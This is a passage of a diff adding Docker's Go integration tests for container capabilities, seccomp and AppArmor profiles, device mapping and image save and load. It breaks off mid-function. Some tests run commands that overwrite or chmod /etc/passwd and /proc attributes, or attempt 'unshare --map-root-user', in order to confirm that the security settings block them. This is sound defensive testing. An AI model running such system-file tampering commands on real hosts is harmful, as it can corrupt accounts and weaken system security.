+ if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 4: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "ns-test", "echo", "hello4") + if err != nil || !strings.Contains(out, "hello4") { + c.Fatalf("test 5: expected hello4, got: %s, %v", out, err) + } +} + +// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// effective uid transtions on executing setuid binaries. +func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + ensureNNPTest(c) + + // test that running a setuid binary results in no effective uid transition + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") { + c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err) + } +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_CHOWN + runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_CHOWN + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_CHOWN + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_DAC_OVERRIDE + runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_DAC_OVERRIDE + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") + // TODO test that root user can drop default capability CAP_DAC_OVERRIDE +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_FOWNER + runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_FOWNER + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // TODO test that root user can drop default capability CAP_FOWNER +} + +// TODO CAP_KILL + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SETUID + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SETUID + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SETUID + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SETGID + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SETGID + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SETGID + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +// TODO CAP_SETPCAP + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_NET_BIND_SERVICE + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_NET_BIND_SERVICE + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") + // test that root user can drop default capability CAP_NET_BIND_SERVICE + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_NET_RAW + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_NET_RAW + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_NET_RAW + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SYS_CHROOT + runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SYS_CHROOT + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SYS_CHROOT + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_MKNOD + runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_MKNOD + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_MKNOD + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +// TODO CAP_AUDIT_WRITE +// TODO CAP_SETFCAP + +func (s *DockerSuite) TestRunApparmorProcDirectory(c *check.C) { + testRequires(c, SameHostDaemon, Apparmor) + + // running w seccomp unconfined tests the apparmor profile + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") + if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err) + } + + runCmd = exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") + if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err) + } +} + +// make sure the default profile can be successfully parsed (using unshare as it is +// something which we know is blocked in the default profile) +func (s *DockerSuite) TestRunSeccompWithDefaultProfile(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + out, _, err := dockerCmdWithError("run", "--security-opt", "seccomp=../profiles/seccomp/default.json", "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "unshare: unshare failed: Operation not permitted") +} + +// TestRunDeviceSymlink checks run with device that follows symlink (#13840 and #22271) +func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm, SameHostDaemon) + if _, err := os.Stat("/dev/zero"); err != nil { + c.Skip("Host does not have /dev/zero") + } + + // Create a temporary directory to create symlink + tmpDir, err := ioutil.TempDir("", "docker_device_follow_symlink_tests") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Create a symbolic link to /dev/zero + symZero := filepath.Join(tmpDir, "zero") + err = os.Symlink("/dev/zero", symZero) + c.Assert(err, checker.IsNil) + + // Create a temporary file "temp" inside tmpDir, write some data to "tmpDir/temp", + // then create a symlink "tmpDir/file" to the temporary file "tmpDir/temp". + tmpFile := filepath.Join(tmpDir, "temp") + err = ioutil.WriteFile(tmpFile, []byte("temp"), 0666) + c.Assert(err, checker.IsNil) + symFile := filepath.Join(tmpDir, "file") + err = os.Symlink(tmpFile, symFile) + c.Assert(err, checker.IsNil) + + // Create a symbolic link to /dev/zero, this time with a relative path (#22271) + err = os.Symlink("zero", "/dev/symzero") + if err != nil { + c.Fatal("/dev/symzero creation failed") + } + // We need to remove this symbolic link here as it is created in /dev/, not temporary directory as above + defer os.Remove("/dev/symzero") + + // md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23 + out, _ := dockerCmd(c, "run", "--device", symZero+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23")) + + // symlink "tmpDir/file" to a file "tmpDir/temp" will result in an error as it is not a device. + out, _, err = dockerCmdWithError("run", "--device", symFile+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(err, check.NotNil) + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "not a device node", check.Commentf("expected output 'not a device node'")) + + // md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23 (this time check with relative path backed, see #22271) + out, _ = dockerCmd(c, "run", "--device", "/dev/symzero:/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23")) +} + +// TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit +func (s *DockerSuite) TestRunPIDsLimit(c *check.C) { + testRequires(c, pidsLimit) + + file := "/sys/fs/cgroup/pids/pids.max" + out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "4") + + out = inspectField(c, "skittles", "HostConfig.PidsLimit") + c.Assert(out, checker.Equals, "4", check.Commentf("setting the pids limit failed")) +} + +func (s *DockerSuite) TestRunPrivilegedAllowedDevices(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + file := "/sys/fs/cgroup/devices/devices.list" + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "cat", file) + c.Logf("out: %q", out) + c.Assert(strings.TrimSpace(out), checker.Equals, "a *:* rwm") +} + +func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) { + testRequires(c, DaemonIsLinux) + + fi, err := os.Stat("/dev/snd/timer") + if err != nil { + c.Skip("Host does not have /dev/snd/timer") + } + stat, ok := fi.Sys().(*syscall.Stat_t) + if !ok { + c.Skip("Could not stat /dev/snd/timer") + } + + file := "/sys/fs/cgroup/devices/devices.list" + out, _ := dockerCmd(c, "run", "--device", "/dev/snd/timer:w", "busybox", "cat", file) + c.Assert(out, checker.Contains, fmt.Sprintf("c %d:%d w", stat.Rdev/256, stat.Rdev%256)) +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "names": ["chmod", "fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "names": ["fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'") +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "archMap": [ + { + "architecture": "SCMP_ARCH_X86_64", + "subArchitectures": [ + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ] + } + ], + "architectures": [ + "SCMP_ARCH_X32" + ], + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "names": ["chmod", "fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'") +} + +func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + // 1) verify I can run containers with the Docker default shipped profile which allows chmod + _, err = s.d.Cmd("run", "busybox", "chmod", "777", ".") + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + // 2) restart the daemon and add a custom seccomp profile in which we deny chmod + err = s.d.Restart("--seccomp-profile=" + tmpFile.Name()) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) { + testRequires(c, cpuCfsQuota, cpuCfsPeriod) + + file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") + + out = inspectField(c, "test", "HostConfig.NanoCpus") + c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed")) + out = inspectField(c, "test", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "test", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go new file mode 100644 index 0000000000..70139a59bc --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go @@ -0,0 +1,383 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "reflect" + "regexp" + "sort" + "strings" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// save a repo using gz compression and try to load it using stdout +func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-xz-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test-xz-gz" + out, _ := dockerCmd(c, "commit", name, repoName) + + dockerCmd(c, "inspect", repoName) + + repoTarball, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command("xz", "-c"), + exec.Command("gzip", "-c")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = strings.NewReader(repoTarball) + out, _, err = runCommandWithOutput(loadCmd) + c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + + after, _, err := dockerCmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) +} + +// save a repo using xz+gz compression and try to load it using stdout +func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-xz-gz-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test-xz-gz" + dockerCmd(c, "commit", name, repoName) + + dockerCmd(c, "inspect", repoName) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command("xz", "-c"), + exec.Command("gzip", "-c")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) + + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = strings.NewReader(out) + out, _, err = runCommandWithOutput(loadCmd) + c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + + after, _, err := dockerCmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) +} + +func (s *DockerSuite) TestSaveSingleTag(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-single-tag-test" + dockerCmd(c, "tag", "busybox:latest", fmt.Sprintf("%v:latest", repoName)) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) + cleanedImageID := strings.TrimSpace(out) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", fmt.Sprintf("%v:latest", repoName)), + exec.Command("tar", "t"), + exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID))) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveCheckTimes(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "busybox:latest" + out, _ := dockerCmd(c, "inspect", repoName) + data := []struct { + ID string + Created time.Time + }{} + err := json.Unmarshal([]byte(out), &data) + c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err)) + c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName)) + tarTvTimeFormat := "2006-01-02 15:04" + out, _, err = runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command("tar", "tv"), + exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex()))) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveImageId(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-image-id-test" + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v:latest", repoName)) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) + cleanedLongImageID := strings.TrimPrefix(strings.TrimSpace(out), "sha256:") + + out, _ = dockerCmd(c, "images", "-q", repoName) + cleanedShortImageID := strings.TrimSpace(out) + + // Make sure IDs are not empty + c.Assert(cleanedLongImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty.")) + c.Assert(cleanedShortImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty.")) + + saveCmd := exec.Command(dockerBinary, "save", cleanedShortImageID) + tarCmd := exec.Command("tar", "t") + + var err error + tarCmd.Stdin, err = saveCmd.StdoutPipe() + c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for tar: %v", err)) + grepCmd := exec.Command("grep", cleanedLongImageID) + grepCmd.Stdin, err = tarCmd.StdoutPipe() + c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for grep: %v", err)) + + c.Assert(tarCmd.Start(), checker.IsNil, check.Commentf("tar failed with error: %v", err)) + c.Assert(saveCmd.Start(), checker.IsNil, check.Commentf("docker save failed with error: %v", err)) + defer func() { + saveCmd.Wait() + tarCmd.Wait() + dockerCmd(c, "rmi", repoName) + }() + + out, _, err = runCommandWithOutput(grepCmd) + + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID: %s, %v", out, err)) +} + +// save a repo and try to load it using flags +func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-and-load-repo-flags" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test" + + deleteImages(repoName) + dockerCmd(c, "commit", name, repoName) + + before, _ := dockerCmd(c, "inspect", repoName) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + + after, _ := dockerCmd(c, "inspect", repoName) + c.Assert(before, checker.Equals, after, check.Commentf("inspect is not the same after a save / load")) +} + +func (s *DockerSuite) TestSaveWithNoExistImage(c *check.C) { + testRequires(c, DaemonIsLinux) + + imgName := "foobar-non-existing-image" + + out, _, err := dockerCmdWithError("save", "-o", "test-img.tar", imgName) + c.Assert(err, checker.NotNil, check.Commentf("save image should fail for non-existing image")) + c.Assert(out, checker.Contains, fmt.Sprintf("No such image: %s", imgName)) +} + +func (s *DockerSuite) TestSaveMultipleNames(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-multi-name-test" + + // Make one image + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-one:latest", repoName)) + + // Make two images + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName)) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)), + exec.Command("tar", "xO", "repositories"), + exec.Command("grep", "-q", "-E", "(-one|-two)"), + ) + c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple repos: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) { + testRequires(c, DaemonIsLinux) + makeImage := func(from string, tag string) string { + var ( + out string + ) + out, _ = dockerCmd(c, "run", "-d", from, "true") + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cleanedContainerID, tag) + imageID := strings.TrimSpace(out) + return imageID + } + + repoName := "foobar-save-multi-images-test" + tagFoo := repoName + ":foo" + tagBar := repoName + ":bar" + + idFoo := makeImage("busybox:latest", tagFoo) + idBar := makeImage("busybox:latest", tagBar) + + deleteImages(repoName) + + // create the archive + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName, "busybox:latest"), + exec.Command("tar", "t")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err)) + + lines := strings.Split(strings.TrimSpace(out), "\n") + var actual []string + for _, l := range lines { + if regexp.MustCompile("^[a-f0-9]{64}\\.json$").Match([]byte(l)) { + actual = append(actual, strings.TrimSuffix(l, ".json")) + } + } + + // make the list of expected layers + out = inspectField(c, "busybox:latest", "Id") + expected := []string{strings.TrimSpace(out), idFoo, idBar} + + // prefixes are not in tar + for i := range expected { + expected[i] = digest.Digest(expected[i]).Hex() + } + + sort.Strings(actual) + sort.Strings(expected) + c.Assert(actual, checker.DeepEquals, expected, check.Commentf("archive does not contains the right layers: got %v, expected %v, output: %q", actual, expected, out)) +} + +// Issue #6722 #5892 ensure directories are included in changes +func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { + testRequires(c, DaemonIsLinux) + layerEntries := []string{"opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"} + layerEntriesAUFS := []string{"./", ".wh..wh.aufs", ".wh..wh.orph/", ".wh..wh.plnk/", "opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"} + + name := "save-directory-permissions" + tmpDir, err := ioutil.TempDir("", "save-layers-with-directories") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary directory: %s", err)) + extractionDirectory := filepath.Join(tmpDir, "image-extraction-dir") + os.Mkdir(extractionDirectory, 0777) + + defer os.RemoveAll(tmpDir) + _, err = buildImage(name, + `FROM busybox + RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a + RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`, + true) + c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", name), + exec.Command("tar", "-xf", "-", "-C", extractionDirectory), + ) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and extract image: %s", out)) + + dirs, err := ioutil.ReadDir(extractionDirectory) + c.Assert(err, checker.IsNil, check.Commentf("failed to get a listing of the layer directories: %s", err)) + + found := false + for _, entry := range dirs { + var entriesSansDev []string + if entry.IsDir() { + layerPath := filepath.Join(extractionDirectory, entry.Name(), "layer.tar") + + f, err := os.Open(layerPath) + c.Assert(err, checker.IsNil, 